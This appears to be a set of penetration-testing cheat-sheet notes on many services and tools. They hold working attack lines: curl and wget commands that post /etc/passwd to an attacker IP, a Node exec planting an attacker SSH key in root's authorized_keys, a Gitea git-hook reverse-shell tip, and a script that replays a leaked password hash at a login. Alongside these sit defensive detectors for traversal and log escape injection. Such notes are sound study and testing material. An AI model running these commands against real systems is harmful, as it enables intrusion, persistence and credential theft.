-
Nmap has its own scripting language (NSE) with which complex or recurring tasks can be automated. See the manpage and share/nmap/scripts.
Vulnerability scan
# nmap -sV -T5 -F $victim --script vuln | tee nmap-vuln.txt
Better vulnerability scans (thanks to this source)
cd /usr/share/nmap/scripts/vulscan/utilities/updater/ && ./updateFiles.sh
nmap --script nmap-vulners -sV -sC -p22 $victim
nmap --script vulscan -sV…
-
High performance, open source universal RPC framework.
gRPC Client CLI
Download the CLI via https://github.com/vadimi/grpc-client-cli. Then:
./grpc-client-cli $target:50051
gRPC Curl
Download via https://github.com/fullstorydev/grpcurl.
gRPC UI
Download via https://github.com/fullstorydev/grpcui. Graphical interface to a gRPC server.
See also
-
Create a file that executes code via its metadata: https://github.com/convisolabs/CVE-2021-22204-exiftool
-
See https://www.infosecmatter.com/firebird-database-exploitation/
-
If you can register an account, do so, create a repository, go to Settings -> Git Hooks and add a command (e.g. a reverse shell) as post-receive hook; it runs on the server at the next push. The Git Hooks tab is only shown to accounts that are allowed to use git hooks. See https://www.cvedetails.com/vulnerability-list/vendor_id-19185/product_id-49829/Gitea-Gitea.html
-
https://gtfobins.github.io/gtfobins/snap/
-
Execute a command (here: overwrite root's authorized_keys with an attacker key):
const { exec } = require("child_process");
exec("echo 'ssh-rsa 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 root@imac2019-kali' > /root/.ssh/authorized_keys", (error, stdout, stderr) => {
  if (error) {
    console.log(`error: ${error.message}`);
    return;
  }
  if (stderr) {
    console.log(`stderr: ${stderr}`);
    return;
  }
  console.log(`stdout: ${stdout}`);
});
-
Write into a file:
curl $url -o /tmp/f.txt
curl $url --output /tmp/f.txt
curl $url > /tmp/f.txt
Post a local file:
curl -X POST --data-binary @/etc/passwd http://192.168.49.53:21/
Execute a command and post the result:
curl -d q=`id` http://localhost:21/
With a header:
curl --header "Host: localhost" 10.10.10.10
Send the path exactly as given, including ../ (curl otherwise normalises the dot segments away before sending; useful for path traversal attacks):
curl --path-as-is $target:$port/public/../../../etc/passwd
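Why --path-as-is is needed, as an added example that is not part of the original notes: by default curl, like a browser, applies the RFC 3986 "remove_dot_segments" step to the request path before sending it, so the traversal never reaches the server. The functions below reproduce that normalisation, show both request lines, and give the server-side view of the same rule. The paths are constructed samples; nothing touches the network.

```python
"""Added example (not from the original notes): why `curl --path-as-is` matters.

By default curl, like browsers, applies RFC 3986 "remove_dot_segments" to the
request path before sending it, so a traversal payload never reaches the server.
The functions below reproduce that normalisation and show both request lines.
Nothing here talks to the network; the paths are constructed samples.
"""
from urllib.parse import unquote


def remove_dot_segments(path: str) -> str:
    """RFC 3986 section 5.2.4 for an absolute path: resolve '.' and '..'.
    '..' above the root is silently dropped, which is exactly why
    '/public/../../../etc/passwd' collapses to '/etc/passwd'."""
    if not path.startswith("/"):
        raise ValueError("absolute path expected")
    segments = path.split("/")[1:]
    output = []
    for i, seg in enumerate(segments):
        last = i == len(segments) - 1
        if seg == "..":
            if output:
                output.pop()
            if last:            # '/a/b/..' -> '/a/' keeps the trailing slash
                output.append("")
        elif seg == ".":
            if last:
                output.append("")
        else:
            output.append(seg)
    return "/" + "/".join(output)


def request_line(path: str, path_as_is: bool = False) -> str:
    """First line of the HTTP request curl would send for `path`."""
    sent = path if path_as_is else remove_dot_segments(path)
    return f"GET {sent} HTTP/1.1"


def looks_like_traversal(raw_path: str) -> bool:
    """Server-side check: a conforming client never sends a path that dot-segment
    removal would change, so any such path (including %2e%2e-encoded forms, hence
    the unquote) is a hand-crafted traversal attempt."""
    decoded = unquote(raw_path)
    return remove_dot_segments(decoded) != decoded


if __name__ == "__main__":
    probe = "/public/../../../etc/passwd"
    print(request_line(probe))                    # GET /etc/passwd HTTP/1.1
    print(request_line(probe, path_as_is=True))   # GET /public/../../../etc/passwd HTTP/1.1
    print(looks_like_traversal("/public/%2e%2e/%2e%2e/etc/passwd"))  # True
```

The same normalisation is what a WAF or framework may apply before routing; looks_like_traversal decodes first because percent-encoded dot segments are the usual way around a naive check on the raw path.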
-
A message broker written in Erlang; uses the Erlang Cowboy web server.
Notes
Default credentials: guest / guest (by default only accepted from localhost).
A user's password can be changed from the command line without knowing the old one:
rabbitmqctl change_password username newpassword
Files with the suffix .DCD contain credentials.
If you have the Erlang cookie:
erl -cookie JPCGJCAEWHPKKPBXBYYB -name rabbit -sname…
-
Listing of all files from a XAMPP for Windows 7.4.6 installation. Look into the phpinfo page; it could reveal usernames.
-
Post a file:
wget --post-file=/etc/passwd http://$attacker_ip/
Set the output file:
wget -O /tmp/s http://...
-
Example of a connection:
openssl s_client -connect $target:995 -crlf -quiet
Issues
The following message means that client and server could not agree on a TLS protocol version, usually because the server only speaks a version that the client has disabled as too old:
139763095926080:error:1425F102:SSL routines:ssl_choose_client_version:unsupported protocol:../ssl/statem/statem_lib.c:1957:
Add TLS 1.0 support:
openssl s_client -connect $target:995 -crlf -quiet -tls1
If a current OpenSSL still refuses, its security level forbids TLS 1.0/1.1 as well; lower it with -cipher 'DEFAULT:@SECLEVEL=0'.
-
Yet Another Ridiculous Acronym is a tool for identifying patterns in binary and text files. YARA rules are written in text files. Calling yara with a rule file and a file to test either returns nothing if no rule matched, or the name of each rule that matches the provided file. Example: The following rule…
-
Should exploit /tmp/18650.py not work, use svwar -m INVITE -e100-500 10.10.10.7 to determine the proper extension id.
-
Version 8 has an interesting vulnerability. Directory traversal with multiple/remote/14641.py reveals a SHA1 password hash. The public login page exposes the salt in a form field and hashes the password client-side with it; the same value can be computed directly from the stolen hash in the browser console:
console.log(hex_hmac_sha1(document.loginform.salt.value, '2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03'));
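The same computation outside the browser, as an added example that is not part of the original notes: read the salt from the login page and compute what the JavaScript hex_hmac_sha1(salt, hash) call produces, so the stolen hash can be replayed from a script. The HTML snippet and the field name "salt" are constructed assumptions; inspect the real page first.

```python
"""Added example, not from the original notes: reproduce the login form's
client-side hashing in Python so the leaked SHA1 hash can be replayed without a
browser. The field names and the HTML snippet are constructed assumptions; a
real login page will differ and must be inspected first.
"""
import hashlib
import hmac
import re

# SHA1 hash recovered through the directory traversal described above.
LEAKED_SHA1 = "2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03"

# Constructed stand-in for the public login page (field name "salt" assumed).
SAMPLE_LOGIN_PAGE = """
<form name="loginform" method="post" action="/login.php">
  <input type="hidden" name="salt" value="5f3a9c1e">
  <input type="text" name="username">
  <input type="password" name="password">
</form>
"""


def extract_salt(html: str) -> str:
    """Read the salt the page hands to the JavaScript hasher."""
    m = re.search(r'name="salt"\s+value="([^"]*)"', html)
    if not m:
        raise ValueError("login page has no salt field")
    return m.group(1)


def login_response(salt: str, stored_hash_hex: str) -> str:
    """Python twin of the JS call hex_hmac_sha1(salt, hash): HMAC-SHA1 keyed
    with the salt over the hex *string* of the stored hash, not its raw bytes.
    Case matters: pass the hex exactly as the application stores it."""
    return hmac.new(salt.encode(), stored_hash_hex.encode(), hashlib.sha1).hexdigest()


if __name__ == "__main__":
    salt = extract_salt(SAMPLE_LOGIN_PAGE)
    print(salt, login_response(salt, LEAKED_SHA1))
```

If the salt is tied to the session, fetch the page and post the login from the same session; the hex string must keep the case in which the application stores it, otherwise the HMAC differs.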
-
Logrotate exploit RCE until 12.8.1
-
Listens on port 9001 by default. Default HTTP authentication credentials: user / 123
-
PuTTY stores session information in the registry: reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
-
Each installation has the following directory structure:
/document root
  /_vti_bin
    shtml.exe
    /_vti_adm
      admin.exe
    /_vti_aut
      author.exe
shtml.exe processes requests from ordinary web browser visitors (e.g. form submissions); author.exe and admin.exe are the authoring and administration interfaces and are not meant for visitors.
Tools
Sparty: FrontPage security audit tool.
-
Main concepts:
Tenant: The "space" which an organization "rents". Has a name.
Users
Groups
Applications
Identity model
Cloud only: Accounts exist only in the foreign system ("cloud").
Synchronized: Accounts are created and managed on-premise and synchronized to the foreign system ("cloud").
Federated: Accounts are created, managed and authenticated on-premise; the foreign system ("cloud") also checks against the on-premise system.…
-
Generic analysis tools
Extract macros with oledump
Use oledump.py to extract macros. List the file contents:
python oledump.py $file
Example from an output:
...
7: M 16267 'Macros/VBA/NewMacros'
8: m 932 'Macros/VBA/ThisDocument'
...
(M marks a stream containing VBA code, m a macro stream with attribute lines only.) To show details of one document part, use its number:
python oledump.py -s $no $file
But to extract macros,…
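A parser for that listing, as an added example that is not oledump's own code: it reads the stream table oledump prints, picks the streams flagged M (VBA code) and builds the follow-up extraction commands. The listing is a constructed sample in oledump's format; the -v flag is oledump's VBA decompression option.

```python
"""Added example (not oledump's own code): parse the stream listing that
`python oledump.py $file` prints and turn it into the follow-up commands.
The listing below is a constructed sample in oledump's format.
"""
import re

SAMPLE_LISTING = """\
  1:       114 '\\x01CompObj'
  2:      4096 '\\x05DocumentSummaryInformation'
  3:      4096 '\\x05SummaryInformation'
  4:      7520 '1Table'
  5:       440 'Macros/PROJECT'
  6:        41 'Macros/PROJECTwm'
  7: M   16267 'Macros/VBA/NewMacros'
  8: m     932 'Macros/VBA/ThisDocument'
  9:      2777 'Macros/VBA/_VBA_PROJECT'
 10:       569 'Macros/VBA/dir'
 11:      4096 'WordDocument'
"""

# index, optional indicator letters, size in bytes, quoted stream name.
# Files with several OLE containers get letter-prefixed indices (A1:, B1:);
# extend the index group if you need those.
LINE_RE = re.compile(
    r"^\s*(?P<index>\d+):\s+(?:(?P<flags>[A-Za-z!]+)\s+)?(?P<size>\d+)\s+'(?P<name>.*)'\s*$"
)


def parse_listing(text: str) -> list:
    """One dict per stream line; other output lines are skipped."""
    streams = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        streams.append({
            "index": int(m["index"]),
            "flags": m["flags"] or "",
            "size": int(m["size"]),
            "name": m["name"],
        })
    return streams


def macro_code_streams(text: str) -> list:
    """Indices of streams oledump flagged 'M': VBA streams that contain code."""
    return [s["index"] for s in parse_listing(text) if "M" in s["flags"]]


def attribute_only_streams(text: str) -> list:
    """'m' streams hold only attribute lines and are rarely worth extracting."""
    return [s["index"] for s in parse_listing(text) if "m" in s["flags"]]


def extraction_commands(text: str, path: str) -> list:
    """`-s N` selects a stream, `-v` decompresses the VBA source."""
    return [f"python oledump.py -s {i} -v {path}" for i in macro_code_streams(text)]


if __name__ == "__main__":
    for cmd in extraction_commands(SAMPLE_LISTING, "sample.doc"):
        print(cmd)   # python oledump.py -s 7 -v sample.doc
```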
-
In Oracle, a SID (System Identifier) names a database instance.
Enumeration
Get general information: tnscmd10g -h $target
Try to get a SID: tnscmd10g status -p 1521 -h $target
Another tool, Oracle Scanner: oscanner -s $target -P 1521
Metasploit module: scanner/oracle/tnslsnr_version
Brute force the SID:
hydra -L /usr/share/metasploit-framework/data/wordlists/sid.txt -s 1521 $target oracle-sid
nmap --script oracle-sid-brute -p 1521 $target
Brute…
-
Vulnerability scanner: https://github.com/steverobbins/magescan
-
Any local user can write arbitrary text into the logs. Messages can be faked, which could mislead persons or surveillance systems, and terminal escape sequences embedded in a message are interpreted by the terminal of whoever reads the log with journalctl. https://turbochaos.blogspot.com/2014/08/journalctl-terminal-escape-injection.html?view=classic
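Detection and defusing logic for that, as an added example that is not from the linked post: it finds terminal escape sequences in log text, flags any line carrying control characters (not only ESC) and renders them visibly instead of letting the terminal interpret them. The journal lines are constructed samples.

```python
"""Added example, not from the linked blog post: detect and defuse terminal
escape sequences in journal text before it is displayed or forwarded.
The log lines are constructed samples.
"""
import re

# Constructed journal output: line 2 is an unprivileged user's message that
# clears the screen (ESC[2J), homes the cursor (ESC[H) and then prints a
# forged sshd line on top of it.
CONSTRUCTED_JOURNAL = [
    "Apr 02 10:15:01 host sshd[812]: Accepted publickey for admin from 10.0.0.5 port 51234",
    "Apr 02 10:15:07 host alice[1401]: \x1b[2J\x1b[HApr 02 10:15:07 host sshd[812]: "
    "Accepted password for root from 203.0.113.9 port 40022",
    "Apr 02 10:15:09 host cron[77]: (root) CMD (/usr/bin/backup.sh)\tdone",
]

# CSI (ESC [ params intermediates final), OSC (ESC ] ... BEL or ESC \) and
# two-byte ESC sequences.
ESCAPE_SEQ = re.compile(
    r"\x1b(?:\[[\x30-\x3f]*[\x20-\x2f]*[\x40-\x7e]"
    r"|\][^\x07\x1b]*(?:\x07|\x1b\\)"
    r"|[\x40-\x5f])"
)


def escape_sequences(line: str) -> list:
    """Every terminal escape sequence embedded in a log line."""
    return ESCAPE_SEQ.findall(line)


def _is_control(ch: str) -> bool:
    # C0 controls except tab, DEL, and C1 controls (0x9b is an 8-bit CSI).
    return ch != "\t" and (ord(ch) < 0x20 or 0x7F <= ord(ch) <= 0x9F)


def is_suspicious(line: str) -> bool:
    """True for any control character, not only ESC: a raw CR or 8-bit CSI
    can forge lines just as well."""
    return any(_is_control(ch) for ch in line)


def sanitize(line: str) -> str:
    """Make control characters visible instead of interpreting them."""
    return "".join("\\x%02x" % ord(ch) if _is_control(ch) else ch for ch in line)


def scan(lines) -> list:
    """(line number, sanitized text) for every line that should be reviewed."""
    return [(n, sanitize(l)) for n, l in enumerate(lines, 1) if is_suspicious(l)]


if __name__ == "__main__":
    for n, text in scan(CONSTRUCTED_JOURNAL):
        print(n, text)
```

Run the journal through sanitize before piping it to a terminal, a mail or a ticket; the escape_sequences list is handy for an alert that names exactly which control sequences a user managed to log.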
-
Create a session tmux new -s <name>
-
With distccd you can compile remotely.
-
See a packet in its context: context menu, choose Follow.
Show only ICMP packets from a host:
tcpdump host 10.11.1.128 and icmp -i tun0
Show other systems communicating outside the own network (Wireshark display filter):
ip.addr == 10.11.1.0/24 && !(ip.addr == 192.168.119.0/24) && ! dns && !browser && !ssdp && !nbns && !llmnr
Record audio
Wireshark can transform captured audio…
-
Start a screen session with a name: screen -S name
List screen sessions: screen -ls
Resume a screen session: screen -xS name